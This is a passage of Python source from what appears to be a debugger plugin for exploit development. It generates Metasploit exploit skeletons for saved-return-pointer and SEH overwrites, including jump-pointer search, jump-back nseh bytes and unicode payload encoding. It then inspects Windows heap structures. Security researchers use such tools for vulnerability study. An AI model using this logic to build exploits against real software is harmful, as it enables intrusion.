#what options do we have ?
# 0 : pointer
# 1 : offset
# 2 : type
if "registers" in mspresults:
for reg in mspresults["registers"]:
if reg.upper() == "EIP":
isEIP = True
eipval = mspresults["registers"][reg][0]
ptrx = MnPointer(eipval)
initialoffsetEIP = mspresults["registers"][reg][1]
# 0 : pointer
# 1 : offset
# 2 : type
# 3 : size
if "seh" in mspresults:
if len(mspresults["seh"]) > 0:
isSEH = True
for seh in mspresults["seh"]:
if mspresults["seh"][seh][2] == "unicode":
isSEHUnicode = True
if not isSEHUnicode:
initialoffsetSEH = mspresults["seh"][seh][1]
else:
initialoffsetSEH = mspresults["seh"][seh][1]
shellcodesizeSEH = mspresults["seh"][seh][3]
if isSEH:
ignoremodules = True
noheader = True
exploitfilename_seh="exploit_seh.rb"
objexploitfile_seh = MnLog(exploitfilename_seh)
exploitfile_seh = objexploitfile_seh.reset()
ignoremodules = False
noheader = False
# start building exploit structure
if not isEIP and not isSEH:
dbg.log(" ** Unable to suggest anything useful. You don't seem to control EIP or SEH ** ",highlight=1)
return
# ask for type of module
if not usecliargs:
dbg.log(" ** Please select a skeleton exploit type from the dropdown list **",highlight=1)
exploittype = dbg.comboBox("Select msf exploit skeleton to build :", exploittypes).lower().strip()
if not exploittype in exploittypes:
dbg.log("Boo - invalid exploit type, try again !",highlight=1)
return
portnr = 0
extension = ""
if exploittype.find("network") > -1:
if usecliargs:
portnr = skeletonarg
else:
portnr = dbg.inputBox("Remote port number : ")
try:
portnr = int(portnr)
except:
portnr = 0
if exploittype.find("fileformat") > -1:
if usecliargs:
extension = skeletonarg
else:
extension = dbg.inputBox("File extension :")
extension = extension.replace("'","").replace('"',"").replace("\n","").replace("\r","")
if not extension.startswith("."):
extension = "." + extension
dbg.createLogWindow()
dbg.updateLog()
url = ""
badchars = ""
if "badchars" in criteria:
badchars = criteria["badchars"]
if "nonull" in criteria:
if not '\x00' in badchars:
badchars += '\x00'
skeletonheader,skeletoninit,skeletoninit2 = getSkeletonHeader(exploittype,portnr,extension,url,badchars)
regsto = ""
if isEIP:
dbg.log("[+] Attempting to create payload for saved return pointer overwrite...")
#where can we jump to - get the register that has the largest buffer size
largestreg = ""
largestsize = 0
offsetreg = 0
regptr = 0
# register_to
# 0 : pointer
# 1 : offset
# 2 : size
# 3 : type
eipcriteria = criteria
modulecriteria["aslr"] = False
modulecriteria["rebase"] = False
modulecriteria["os"] = False
jmp_pointers = {}
jmppointer = 0
instrinfo = ""
if isEIPUnicode:
eipcriteria["unicode"] = True
eipcriteria["nonull"] = False
if "registers_to" in mspresults:
for reg in mspresults["registers_to"]:
regsto += reg+","
thissize = mspresults["registers_to"][reg][2]
thisreg = reg
thisoffset = mspresults["registers_to"][reg][1]
thisregptr = mspresults["registers_to"][reg][0]
if thisoffset < initialoffsetEIP:
#fix the size, which will end at offset to EIP
thissize = initialoffsetEIP - thisoffset
if thissize > largestsize:
# can we find a jmp to that reg ?
silent = True
ptr_counter = 0
ptr_to_get = 1
jmp_pointers = findJMP(modulecriteria,eipcriteria,reg.lower())
if len( jmp_pointers ) == 0:
ptr_counter = 0
ptr_to_get = 1
modulecriteria["os"] = True
jmp_pointers = findJMP(modulecriteria,eipcriteria,reg.lower())
modulecriteria["os"] = False
if len( jmp_pointers ) > 0:
largestsize = thissize
largestreg = thisreg
offsetreg = thisoffset
regptr = thisregptr
silent = False
regsto = regsto.rstrip(",")
if largestreg == "":
dbg.log(" Payload is referenced by at least one register (%s), but I couldn't seem to find" % regsto,highlight=1)
dbg.log(" a way to jump to that register",highlight=1)
else:
#build exploit
for ptrtype in jmp_pointers:
jmppointer = jmp_pointers[ptrtype][0]
instrinfo = ptrtype
break
ptrx = MnPointer(jmppointer)
modname = ptrx.belongsTo()
targetstr = " 'Targets' =>\n"
targetstr += " [\n"
targetstr += " [ '<fill in the OS/app version here>',\n"
targetstr += " {\n"
if not isEIPUnicode:
targetstr += " 'Ret' => 0x" + toHex(jmppointer) + ", # " + instrinfo + " - " + modname + "\n"
targetstr += " 'Offset' => " + str(initialoffsetEIP) + "\n"
else:
origptr = toHex(jmppointer)
#real unicode ?
unicodeptr = ""
transforminfo = ""
if origptr[0] == "0" and origptr[1] == "0" and origptr[4] == "0" and origptr[5] == "0":
unicodeptr = "\"\\x" + origptr[6] + origptr[7] + "\\x" + origptr[2] + origptr[3] + "\""
else:
#transform
transform = UnicodeTransformInfo(origptr)
transformparts = transform.split(",")
transformsubparts = transformparts[0].split(" ")
origptr = transformsubparts[len(transformsubparts)-1]
transforminfo = " #unicode transformed to 0x" + toHex(jmppointer)
unicodeptr = "\"\\x" + origptr[6] + origptr[7] + "\\x" + origptr[2] + origptr[3] + "\""
targetstr += " 'Ret' => " + unicodeptr + "," + transforminfo + "# " + instrinfo + " - " + modname + "\n"
targetstr += " 'Offset' => " + str(initialoffsetEIP) + " #Unicode\n"
targetstr += " }\n"
targetstr += " ],\n"
targetstr += " ],\n"
exploitstr = " def exploit\n\n"
if exploittype.find("network") > -1:
if exploittype.find("tcp") > -1:
exploitstr += "\n connect\n\n"
elif exploittype.find("udp") > -1:
exploitstr += "\n connect_udp\n\n"
if initialoffsetEIP < offsetreg:
# eip is before shellcode
exploitstr += " buffer = rand_text(target['Offset']) \n"
if not isEIPUnicode:
exploitstr += " buffer << [target.ret].pack('V') \n"
else:
exploitstr += " buffer << target['Ret'] #Unicode friendly jump\n\n"
if offsetreg > initialoffsetEIP+2:
if not isEIPUnicode:
if (offsetreg - initialoffsetEIP - 4) > 0:
exploitstr += " buffer << rand_text(" + str(offsetreg - initialoffsetEIP - 4) + ") #junk\n"
else:
if ((offsetreg - initialoffsetEIP - 4)/2) > 0:
exploitstr += " buffer << rand_text(" + str((offsetreg - initialoffsetEIP - 4)/2) + ") #unicode junk\n"
stackadjust = 0
if largestreg.upper() == "ESP":
if not isEIPUnicode:
exploitstr += " buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, 'add esp,-1500').encode_string # avoid GetPC shellcode corruption\n"
stackadjust = 6
exploitstr += " buffer << payload.encoded #max " + str(largestsize - stackadjust) + " bytes\n"
if isEIPUnicode:
exploitstr += " # Metasploit requires double encoding for unicode : Use alpha_xxxx encoder in the payload section\n"
exploitstr += " # and then manually encode with unicode inside the exploit section :\n\n"
exploitstr += " enc = framework.encoders.create('x86/unicode_mixed')\n\n"
exploitstr += " register_to_align_to = '" + largestreg.upper() + "'\n\n"
if largestreg.upper() == "ESP":
exploitstr += " # Note : since you are using ESP as bufferregister, make sure EBP points to a writeable address !\n"
exploitstr += " # or patch the unicode decoder yourself\n"
exploitstr += " enc.datastore.import_options_from_hash({ 'BufferRegister' => register_to_align_to })\n\n"
exploitstr += " unicodepayload = enc.encode(payload.encoded, nil, nil, platform)\n\n"
exploitstr += " buffer << unicodepayload"
else:
# EIP -> jump to location before EIP
beforeEIP = initialoffsetEIP - offsetreg
if beforeEIP > 0:
if offsetreg > 0:
exploitstr += " buffer = rand_text(" + str(offsetreg)+") #offset to " + largestreg+"\n"
exploitstr += " buffer << payload.encoded #max " + str(initialoffsetEIP - offsetreg) + " bytes\n"
exploitstr += " buffer << rand_text(target['Offset'] - payload.encoded.length)\n"
exploitstr += " buffer << [target.ret].pack('V') \n"
else:
exploitstr += " buffer = payload.encoded #max " + str(initialoffsetEIP - offsetreg) + " bytes\n"
exploitstr += " buffer << rand_text(target['Offset'] - payload.encoded.length)\n"
exploitstr += " buffer << [target.ret].pack('V') \n"
if exploittype.find("network") > -1:
exploitstr += "\n print_status(\"Trying target #{target.name}...\")\n"
if exploittype.find("tcp") > -1:
exploitstr += " sock.put(buffer)\n"
exploitstr += "\n handler\n"
elif exploittype.find("udp") > -1:
exploitstr += " udp_sock.put(buffer)\n"
exploitstr += "\n handler(udp_sock)\n"
if exploittype == "fileformat":
exploitstr += "\n file_create(buffer)\n\n"
if exploittype.find("network") > -1:
exploitstr += " disconnect\n\n"
exploitstr += " end\n"
dbg.log("Metasploit 'Targets' section :")
dbg.log("------------------------------")
dbg.logLines(targetstr.replace(" "," "))
dbg.log("")
dbg.log("Metasploit 'exploit' function :")
dbg.log("--------------------------------")
dbg.logLines(exploitstr.replace(" "," "))
#write skeleton
objexploitfile.write(skeletonheader+"\n",exploitfile)
objexploitfile.write(skeletoninit+"\n",exploitfile)
objexploitfile.write(targetstr,exploitfile)
objexploitfile.write(skeletoninit2,exploitfile)
objexploitfile.write(exploitstr,exploitfile)
objexploitfile.write("end",exploitfile)
if isSEH:
dbg.log("[+] Attempting to create payload for SEH record overwrite...")
sehcriteria = criteria
modulecriteria["safeseh"] = False
modulecriteria["rebase"] = False
modulecriteria["aslr"] = False
modulecriteria["os"] = False
sehptr = 0
instrinfo = ""
if isSEHUnicode:
sehcriteria["unicode"] = True
if "nonull" in sehcriteria:
sehcriteria.pop("nonull")
modulecriteria["safeseh"] = False
#get SEH pointers
silent = True
ptr_counter = 0
ptr_to_get = 1
seh_pointers = findSEH(modulecriteria,sehcriteria)
jmpback = False
silent = False
if not isSEHUnicode:
#did we find a pointer ?
if len(seh_pointers) == 0:
#did we try to avoid nulls ?
dbg.log("[+] No non-null pointers found, trying 'jump back' layout now...")
if "nonull" in sehcriteria:
if sehcriteria["nonull"] == True:
sehcriteria.pop("nonull")
silent = True
ptr_counter = 0
ptr_to_get = 1
seh_pointers = findSEH(modulecriteria,sehcriteria)
silent = False
jmpback = True
if len(seh_pointers) != 0:
for ptrtypes in seh_pointers:
sehptr = seh_pointers[ptrtypes][0]
instrinfo = ptrtypes
break
else:
if len(seh_pointers) == 0:
sehptr = 0
else:
for ptrtypes in seh_pointers:
sehptr = seh_pointers[ptrtypes][0]
instrinfo = ptrtypes
break
if sehptr != 0:
ptrx = MnPointer(sehptr)
modname = ptrx.belongsTo()
mixin = ""
if not jmpback:
mixin += "#Don't forget to include the SEH mixin !\n"
mixin += "include Msf::Exploit::Seh\n\n"
skeletonheader += " include Msf::Exploit::Seh\n"
targetstr = " 'Targets' =>\n"
targetstr += " [\n"
targetstr += " [ '<fill in the OS/app version here>',\n"
targetstr += " {\n"
if not isSEHUnicode:
targetstr += " 'Ret' => 0x" + toHex(sehptr) + ", # " + instrinfo + " - " + modname + "\n"
targetstr += " 'Offset' => " + str(initialoffsetSEH) + "\n"
else:
origptr = toHex(sehptr)
#real unicode ?
unicodeptr = ""
transforminfo = ""
if origptr[0] == "0" and origptr[1] == "0" and origptr[4] == "0" and origptr[5] == "0":
unicodeptr = "\"\\x" + origptr[6] + origptr[7] + "\\x" + origptr[2] + origptr[3] + "\""
else:
#transform
transform = UnicodeTransformInfo(origptr)
transformparts = transform.split(",")
transformsubparts = transformparts[0].split(" ")
origptr = transformsubparts[len(transformsubparts)-1]
transforminfo = " #unicode transformed to 0x" + toHex(sehptr)
unicodeptr = "\"\\x" + origptr[6] + origptr[7] + "\\x" + origptr[2] + origptr[3] + "\""
targetstr += " 'Ret' => " + unicodeptr + "," + transforminfo + " # " + instrinfo + " - " + modname + "\n"
targetstr += " 'Offset' => " + str(initialoffsetSEH) + " #Unicode\n"
targetstr += " }\n"
targetstr += " ],\n"
targetstr += " ],\n"
exploitstr = " def exploit\n\n"
if exploittype.find("network") > -1:
exploitstr += "\n connect\n\n"
if not isSEHUnicode:
if not jmpback:
exploitstr += " buffer = rand_text(target['Offset']) #junk\n"
exploitstr += " buffer << generate_seh_record(target.ret)\n"
exploitstr += " buffer << payload.encoded #" + str(shellcodesizeSEH) +" bytes of space\n"
exploitstr += " # more junk may be needed to trigger the exception\n"
else:
exploitstr += " jmp_back = Rex::Arch::X86.jmp_short(-payload.encoded.length-5)\n\n"
exploitstr += " buffer = rand_text(target['Offset'] - payload.encoded.length - jmp_back.length) #junk\n"
exploitstr += " buffer << payload.encoded\n"
exploitstr += " buffer << jmp_back #jump back to start of payload.encoded\n"
exploitstr += " buffer << '\\xeb\\xf9\\x41\\x41' #nseh, jump back to jmp_back\n"
exploitstr += " buffer << [target.ret].pack('V') #seh\n"
else:
exploitstr += " nseh = <insert 2 bytes that will acts as nseh walkover>\n"
exploitstr += " align = <insert routine to align a register to begin of payload and jump to it>\n\n"
exploitstr += " padding = <insert bytes to fill space between alignment code and payload>\n\n"
exploitstr += " # Metasploit requires double encoding for unicode : Use alpha_xxxx encoder in the payload section\n"
exploitstr += " # and then manually encode with unicode inside the exploit section :\n\n"
exploitstr += " enc = framework.encoders.create('x86/unicode_mixed')\n\n"
exploitstr += " register_to_align_to = <fill in the register name you will align to>\n\n"
exploitstr += " enc.datastore.import_options_from_hash({ 'BufferRegister' => register_to_align_to })\n\n"
exploitstr += " unicodepayload = enc.encode(payload.encoded, nil, nil, platform)\n\n"
exploitstr += " buffer = rand_text(target['Offset']) #unicode junk\n"
exploitstr += " buffer << nseh #Unicode walkover friendly dword\n"
exploitstr += " buffer << target['Ret'] #Unicode friendly p/p/r\n"
exploitstr += " buffer << align\n"
exploitstr += " buffer << padding\n"
exploitstr += " buffer << unicodepayload\n"
if exploittype.find("network") > -1:
exploitstr += "\n print_status(\"Trying target #{target.name}...\")\n"
exploitstr += " sock.put(buffer)\n\n"
exploitstr += " handler\n"
if exploittype == "fileformat":
exploitstr += "\n file_create(buffer)\n\n"
if exploittype.find("network") > -1:
exploitstr += " disconnect\n\n"
exploitstr += " end\n"
if mixin != "":
dbg.log("Metasploit 'include' section :")
dbg.log("------------------------------")
dbg.logLines(mixin)
dbg.log("Metasploit 'Targets' section :")
dbg.log("------------------------------")
dbg.logLines(targetstr.replace(" "," "))
dbg.log("")
dbg.log("Metasploit 'exploit' function :")
dbg.log("--------------------------------")
dbg.logLines(exploitstr.replace(" "," "))
#write skeleton
objexploitfile_seh.write(skeletonheader+"\n",exploitfile_seh)
objexploitfile_seh.write(skeletoninit+"\n",exploitfile_seh)
objexploitfile_seh.write(targetstr,exploitfile_seh)
objexploitfile_seh.write(skeletoninit2,exploitfile_seh)
objexploitfile_seh.write(exploitstr,exploitfile_seh)
objexploitfile_seh.write("end",exploitfile_seh)
else:
dbg.log(" Unable to suggest a buffer layout because I couldn't find any good pointers",highlight=1)
return
#-----stacks-----#
def procStacks(args):
stacks = getStacks()
if len(stacks) > 0:
dbg.log("Stacks :")
dbg.log("--------")
for threadid in stacks:
dbg.log("Thread %s : Stack : 0x%s - 0x%s (size : 0x%s)" % (str(threadid),toHex(stacks[threadid][0]),toHex(stacks[threadid][1]),toHex(stacks[threadid][1]-stacks[threadid][0])))
else:
dbg.log("No threads/stacks found !",highlight=1)
return
#------heapstuff-----#
def procHeap(args):
os = dbg.getOsVersion()
heapkey = 0
#first, print list of heaps
allheaps = []
try:
allheaps = dbg.getHeapsAddress()
except:
allheaps = []
dbg.log("Peb : 0x%08x, NtGlobalFlag : 0x%08x" % (dbg.getPEBAddress(),getNtGlobalFlag()))
dbg.log("Heaps:")
dbg.log("------")
if len(allheaps) > 0:
for heap in allheaps:
segments = getSegmentList(heap)
segmentlist = []
for segment in segments:
segmentlist.append(segment)
if not win7mode:
segmentlist.sort()
segmentinfo = ""
for segment in segmentlist:
segmentinfo = segmentinfo + "0x%08x" % segment + ","
segmentinfo = segmentinfo.strip(",")
segmentinfo = " : " + segmentinfo
defheap = ""
lfhheap = ""
keyinfo = ""
if heap == getDefaultProcessHeap():
defheap = "* Default process heap"
if win7mode:
iHeap = MnHeap(heap)
if iHeap.usesLFH():
lfhheapaddress = iHeap.getLFHAddress()
lfhheap = "[LFH enabled, _LFH_HEAP at 0x%08x]" % lfhheapaddress
if iHeap.getEncodingKey() > 0:
keyinfo = "Encoding key: 0x%08x" % iHeap.getEncodingKey()
dbg.log("0x%08x (%d segment(s)%s) %s %s %s" % (heap,len(segments),segmentinfo,defheap,lfhheap,keyinfo))
else:
dbg.log(" ** No heaps found")
dbg.log("")
heapbase = 0
searchtype = ""
searchtypes = ["lal","lfh","all","segments", "chunks", "layout", "fea", "bea"]
error = False
filterafter = ""
showdata = False
findvtablesize = True
expand = False
minstringlength = 32
if len(allheaps) > 0:
if "h" in args and type(args["h"]).__name__.lower() != "bool":
hbase = args["h"].replace("0x","").replace("0X","")
if not (isAddress(hbase) or hbase.lower() == "default"):
dbg.log("%s is an invalid address" % args["h"], highlight=1)
return
else:
if hbase.lower() == "default":
heapbase = getDefaultProcessHeap()
else:
heapbase = hexStrToInt(hbase)
if "t" in args:
if type(args["t"]).__name__.lower() != "bool":
searchtype = args["t"].lower().replace('"','').replace("'","")
if searchtype == "blocks":
dbg.log("** Note : type 'blocks' has been replaced with 'chunks'",highlight=1)
dbg.log("")
searchtype = "chunks"
if not searchtype in searchtypes:
searchtype = ""
else:
searchtype = ""
if "after" in args:
if type(args["after"]).__name__.lower() != "bool":
filterafter = args["after"].replace('"','').replace("'","")
if "v" in args:
showdata = True
if "expand" in args:
expand = True
if "fast" in args:
findvtablesize = False
showdata = False
if searchtype == "" and not "stat" in args:
dbg.log("Please specify a valid searchtype -t",highlight=1)
dbg.log("Valid values are :",highlight=1)
for val in searchtypes:
if val != "blocks":
dbg.log(" %s" % val,highlight=1)
error = True
if "h" in args and heapbase == 0:
dbg.log("Please specify a valid heap base address -h",highlight=1)
error = True
if "size" in args:
if type(args["size"]).__name__.lower() != "bool":
size = args["size"].lower()
if size.startswith("0x"):
minstringlength = hexStrToInt(size)
else:
minstringlength = int(size)
else:
dbg.log("Please provide a valid size -size",highlight=1)
error = True
if "clearcache" in args:
dbg.forgetKnowledge("vtableCache")
dbg.log("[+] vtableCache cleared.")
else:
dbg.log("No heaps found",highlight=1)
return
heap_to_query = []
heapfound = False
if "h" in args:
for heap in allheaps:
if heapbase == heap:
heapfound = True
heap_to_query = [heapbase]
if not heapfound:
error = True
dbg.log("0x%08x is not a valid heap base address" % heapbase,highlight=1)
else:
#show all heaps
for heap in allheaps:
heap_to_query.append(heap)
if error:
return
else:
statinfo = {}
logfile_b = ""
thislog_b = ""
logfile_l = ""
logfile_l = ""
if searchtype == "chunks" or searchtype == "all":
logfile_b = MnLog("heapchunks.txt")
thislog_b = logfile_b.reset()
if searchtype == "layout" or searchtype == "all":
logfile_l = MnLog("heaplayout.txt")
thislog_l = logfile_l.reset()
for heapbase in heap_to_query:
mHeap = MnHeap(heapbase)
heapbase_extra = ""
frontendinfo = []
frontendheapptr = 0
frontendheaptype = 0
if win7mode:
heapkey = mHeap.getEncodingKey()
if mHeap.usesLFH():
frontendheaptype = 0x2
heapbase_extra = " [LFH] "
frontendheapptr = mHeap.getLFHAddress()
frontendinfo = [frontendheaptype,frontendheapptr]
dbg.log("")
dbg.log("[+] Processing heap 0x%08x%s" % (heapbase,heapbase_extra))
if searchtype == "fea":
if win7mode:
searchtype = "lfh"
else:
searchtype = "lal"
if searchtype == "bea":
searchtype = "freelist"
# LookAsideList
if searchtype == "lal" or (searchtype == "all" and not win7mode):
lalindex = 0
if win7mode:
dbg.log(" !! This version of the OS doesn't have a LookAside List !!")
else:
dbg.log("[+] FrontEnd Allocator : LookAsideList")
dbg.log("[+] Getting LookAsideList for heap 0x%08x" % heapbase)
# do we have a LAL for this heap ?
FrontEndHeap = mHeap.getFrontEndHeap()
if FrontEndHeap > 0:
dbg.log(" FrontEndHeap: 0x%08x" % FrontEndHeap)
fea_lal = mHeap.getLookAsideList()
dbg.log(" Nr of (non-empty) LookAside Lists : %d" % len(fea_lal))
dbg.log("")
for lal_table_entry in sorted(fea_lal.keys()):
expectedsize = lal_table_entry * 8
nr_of_chunks = len(fea_lal[lal_table_entry])
lalhead = struct.unpack('<L',dbg.readMemory(FrontEndHeap + (0x30 * lal_table_entry),4))[0]
dbg.log("LAL [%d] @0x%08x, Expected Chunksize 0x%x (%d), Flink : 0x%08x" % (lal_table_entry,FrontEndHeap + (0x30 * lal_table_entry),expectedsize,expectedsize,lalhead))
mHeap.showLookAsideHead(lal_table_entry)
dbg.log(" %d chunks:" % nr_of_chunks)
for chunkindex in fea_lal[lal_table_entry]:
lalchunk = fea_lal[lal_table_entry][chunkindex]
chunksize = lalchunk.size * 8
flag = getHeapFlag(lalchunk.flag)
data = ""
if showdata:
data = bin2hex(dbg.readMemory(lalchunk.userptr,16))
dbg.log(" ChunkPtr: 0x%08x, UserPtr: 0x%08x, Flink: 0x%08x, ChunkSize: 0x%x, UserSize: 0x%x, Userspace: 0x%x (%s) %s" % (lalchunk.chunkptr, lalchunk.userptr,lalchunk.flink,chunksize,lalchunk.usersize,lalchunk.usersize+lalchunk.remaining,flag,data))
if chunksize != expectedsize:
dbg.log(" ^^ ** Warning - unexpected size value, header corrupted ? **",highlight=True)
dbg.log("")
else:
dbg.log("[+] No LookAsideList found for this heap")
dbg.log("")
if searchtype == "lfh" or (searchtype == "all" and win7mode):
dbg.log("[+] FrontEnd Allocator : Low Fragmentation Heap")
dbg.log(" ** Not implemented yet **")
if searchtype == "freelist" or (searchtype == "all" and not win7mode):
flindex = 0
dbg.log("[+] BackEnd Allocator : FreeLists")
dbg.log("[+] Getting FreeLists for heap 0x%08x" % heapbase)
thisfreelist = mHeap.getFreeList()
thisfreelistinusebitmap = mHeap.getFreeListInUseBitmap()
bitmapstr = ""
for bit in thisfreelistinusebitmap:
bitmapstr += str(bit)
dbg.log("[+] FreeListsInUseBitmap:")
printDataArray(bitmapstr,32,prefix=" ")
# make sure the freelist is printed in the correct order
flindex = 0
while flindex < 128:
if flindex in thisfreelist:
freelist_addy = heapbase + 0x178 + (8 * flindex)
expectedsize = ">1016"
expectedsize2 = ">0x%x" % 1016
if flindex != 0:
expectedsize2 = str(8 * flindex)
expectedsize = "0x%x" % (8 * flindex)
dbg.log("[+] FreeList[%02d] at 0x%08x, Expected size: %s (%s)" % (flindex,freelist_addy,expectedsize,expectedsize2))
flindicator = 0
for flentry in thisfreelist[flindex]:
freelist_chunk = thisfreelist[flindex][flentry]
chunksize = freelist_chunk.size * 8
dbg.log(" ChunkPtr: 0x%08x, Header: 0x%x bytes, UserPtr: 0x%08x, Flink: 0x%08x, Blink: 0x%08x, ChunkSize: 0x%x (%d), Usersize: 0x%x (%d) " % (freelist_chunk.chunkptr, freelist_chunk.headersize, freelist_chunk.userptr,freelist_chunk.flink,freelist_chunk.blink,chunksize,chunksize,freelist_chunk.usersize,freelist_chunk.usersize))
if flindex != 0 and chunksize != (8*flindex):
dbg.log(" ** Header may be corrupted! **", highlight = True)
flindicator = 1
if flindex > 1 and int(bitmapstr[flindex]) != flindicator:
dbg.log(" ** FreeListsInUseBitmap mismatch for index %d! **" % flindex, highlight = True)
flindex += 1
if searchtype == "layout" or searchtype == "all":
segments = getSegmentsForHeap(heapbase)
sortedsegments = []
global vtableCache
# read vtableCache from knowledge
vtableCache = dbg.getKnowledge("vtableCache")
if vtableCache is None:
vtableCache = {}
for seg in segments:
sortedsegments.append(seg)
if not win7mode:
sortedsegments.sort()
segmentcnt = 0
minstringlen = minstringlength
blockmem = []
nr_filter_matches = 0
vablocks = []
# VirtualAllocdBlocks
vachunks = mHeap.getVirtualAllocdBlocks()
infoblocks = {}
infoblocks["segments"] = sortedsegments
if expand:
infoblocks["virtualallocdblocks"] = [vachunks]
for infotype in infoblocks:
heapdata = infoblocks[infotype]
for thisdata in heapdata:
if infotype == "segments":
seg = thisdata
segmentcnt += 1
segstart = segments[seg][0]
segend = segments[seg][1]
FirstEntry = segments[seg][2]
LastValidEntry = segments[seg][3]
datablocks = walkSegment(FirstEntry,LastValidEntry,heapbase)
tolog = "----- Heap 0x%08x%s, Segment 0x%08x - 0x%08x (%d/%d) -----" % (heapbase,heapbase_extra,segstart,segend,segmentcnt,len(sortedsegments))
if infotype == "virtualallocdblocks":
datablocks = heapdata[0]
tolog = "----- Heap 0x%08x%s, VirtualAllocdBlocks : %d" % (heapbase,heapbase_extra,len(datablocks))
logfile_l.write(" ",thislog_l)
dbg.log(tolog)
logfile_l.write(tolog,thislog_l)
sortedblocks = []
for block in datablocks:
sortedblocks.append(block)
sortedblocks.sort()
# for each block, try to get info
# object ?
# BSTR ?
# str ?
for block in sortedblocks:
showinlog = False
thischunk = datablocks[block]
unused = thischunk.unused
headersize = thischunk.headersize
flags = getHeapFlag(thischunk.flag)
userptr = block + headersize
psize = thischunk.prevsize * 8
blocksize = thischunk.size * 8
selfsize = blocksize
usersize = selfsize - unused
usersize = blocksize - unused
extratxt = ""
if infotype == "virtualallocdblocks":
selfsize = thischunk.commitsize * 8
blocksize = selfsize
usersize = selfsize - unused
nextblock = thischunk.flink
# read block into memory
blockmem = dbg.readMemory(block,blocksize)
# first, find all strings (ascii, unicode and BSTR)
asciistrings = {}
unicodestrings = {}
bstr = {}
objects = {}
asciistrings = getAllStringOffsets(blockmem,minstringlen)
# determine remaining subsets of the original block
remaining = {}
curpos = 0
for stringpos in asciistrings:
if stringpos > curpos:
remaining[curpos] = stringpos - curpos
curpos = asciistrings[stringpos]
if curpos < blocksize:
remaining[curpos] = blocksize
# search for unicode in remaining subsets only - tx for the regex help Turboland !
for remstart in remaining:
remend = remaining[remstart]
thisunicodestrings = getAllUnicodeStringOffsets(blockmem[remstart:remend],minstringlen,remstart)
# append results to master list
for tus in thisunicodestrings:
unicodestrings[tus] = thisunicodestrings[tus]
# check each unicode, maybe it's a BSTR
tomove = []
for unicodeoffset in unicodestrings:
delta = unicodeoffset
size = (unicodestrings[unicodeoffset] - unicodeoffset)/2
if delta >= 4:
maybesize = struct.unpack('<L',blockmem[delta-3:delta+1])[0] # it's an offset, remember ?
if maybesize == (size*2):
tomove.append(unicodeoffset)
bstr[unicodeoffset] = unicodestrings[unicodeoffset]
for todel in tomove:
del unicodestrings[todel]
# get objects too
# find all unique objects
# again, just store offset
objects = {}
orderedobj = []
if __DEBUGGERAPP__ == "WinDBG":
nrlines = int(float(blocksize) / 4)
cmd2run = "dds 0x%08x L 0x%x" % ((block + headersize),nrlines)
output = dbg.nativeCommand(cmd2run)
outputlines = output.split("\n")
for line in outputlines:
if line.find("::") > -1 and line.find("vftable") > -1:
parts = line.split(" ")
objconstr = ""
if len(parts) > 3:
objectptr = hexStrToInt(parts[0])
cnt = 2
objectinfo = ""
while cnt < len(parts):
objectinfo += parts[cnt] + " "
cnt += 1
parts2 = line.split("::")
parts2name = ""
pcnt = 0
while pcnt < len(parts2)-1:
parts2name = parts2name + "::" + parts2[pcnt]
pcnt += 1
parts3 = parts2name.split(" ")
if len(parts3) > 3:
objconstr = parts3[3]
if not objectptr in objects:
objects[objectptr-block] = [objectinfo,objconstr]
objsize = 0
if findvtablesize:
if not objconstr in vtableCache:
cmd2run = "u %s::CreateElement L 12" % objconstr
objoutput = dbg.nativeCommand(cmd2run)
if not "HeapAlloc" in objoutput:
cmd2run = "x %s::operator*" % objconstr
oplist = dbg.nativeCommand(cmd2run)
oplines = oplist.split("\n")
oppat = "%s::operator" % objconstr
for opline in oplines:
if oppat in opline and not "del" in opline:
lineparts = opline.split(" ")
cmd2run = "uf %s" % lineparts[0]
objoutput = dbg.nativeCommand(cmd2run)
break
if "HeapAlloc" in objoutput:
objlines = objoutput.split("\n")
lineindex = 0
for objline in objlines:
if "HeapAlloc" in objline:
if lineindex >= 3:
sizeline = objlines[lineindex-3]
if "push" in sizeline:
sizelineparts = sizeline.split("push")
if len(sizelineparts) > 1:
sizevalue = sizelineparts[len(sizelineparts)-1].replace(" ","").replace("h","")
try:
objsize = hexStrToInt(sizevalue)
# adjust allocation granulariy
remainsize = objsize - ((objsize / 8) * 8)
while remainsize != 0:
objsize += 1
remainsize = objsize - ((objsize / 8) * 8)
except:
#print traceback.format_exc()
objsize = 0
break
lineindex += 1
vtableCache[objconstr] = objsize
else:
objsize = vtableCache[objconstr]
# remove object entries that belong to the same object
allobjects = []
objectstodelete = []
for optr in objects:
allobjects.append(optr)
allobjects.sort()
skipuntil = 0
for optr in allobjects:
if optr < skipuntil:
objectstodelete.append(optr)
else:
objname = objects[optr][1]
objsize = 0
try:
objsize = vtableCache[objname]
except:
objsize = 0
skipuntil = optr + objsize
# remove vtable lines that are too close to each other
minvtabledistance = 0x0c
prevvname = ""
prevptr = 0
thisvname = ""
for optr in allobjects:
thisvname = objects[optr][1]
if thisvname == prevvname and (optr - prevptr) <= minvtabledistance:
if not optr in objectstodelete:
objectstodelete.append(optr)
else:
prevptr = optr
prevvname = thisvname
for vtableptr in objectstodelete:
del objects[vtableptr]
for obj in objects:
orderedobj.append(obj)
for ascstring in asciistrings:
orderedobj.append(ascstring)
for unicodestring in unicodestrings:
orderedobj.append(unicodestring)
for bstrobj in bstr:
orderedobj.append(bstrobj)
orderedobj.sort()
# print out details for this chunk
chunkprefix = ""
fieldname1 = "Usersize"
fieldname2 = "ChunkSize"
if infotype == "virtualallocdblocks":
chunkprefix = "VA "
fieldname1 = "CommitSize"
tolog = "%sChunk 0x%08x (%s 0x%x, %s 0x%x) : %s" % (chunkprefix,block,fieldname1,usersize,fieldname2,usersize+unused,flags)
if showdata:
dbg.log(tolog)
logfile_l.write(tolog,thislog_l)
previousptr = block
previoussize = 0
showinlog = False
for ptr in orderedobj:
ptrtype = ""
ptrinfo = ""
data = ""
alldata = ""
blockinfo = ""
ptrbytes = 0
endptr = 0
datasize = 0
ptrchars = 0
infoptr = block + ptr
endptr = 0
if ptr in asciistrings:
ptrtype = "String"
dataend = asciistrings[ptr]
data = blockmem[ptr:dataend]
alldata = data
ptrbytes = len(data)
ptrchars = ptrbytes
datasize = ptrbytes
if ptrchars > 100:
data = data[0:100]+"..."
blockinfo = "%s (Data : 0x%x/%d bytes, 0x%x/%d chars) : %s" % (ptrtype,ptrbytes,ptrbytes,ptrchars,ptrchars,data)
infoptr = block + ptr
endptr = infoptr + ptrchars - 1 # need -1
elif ptr in bstr:
ptrtype = "BSTR"
dataend = bstr[ptr]
data = blockmem[ptr:dataend].replace("\x00","")
alldata = data
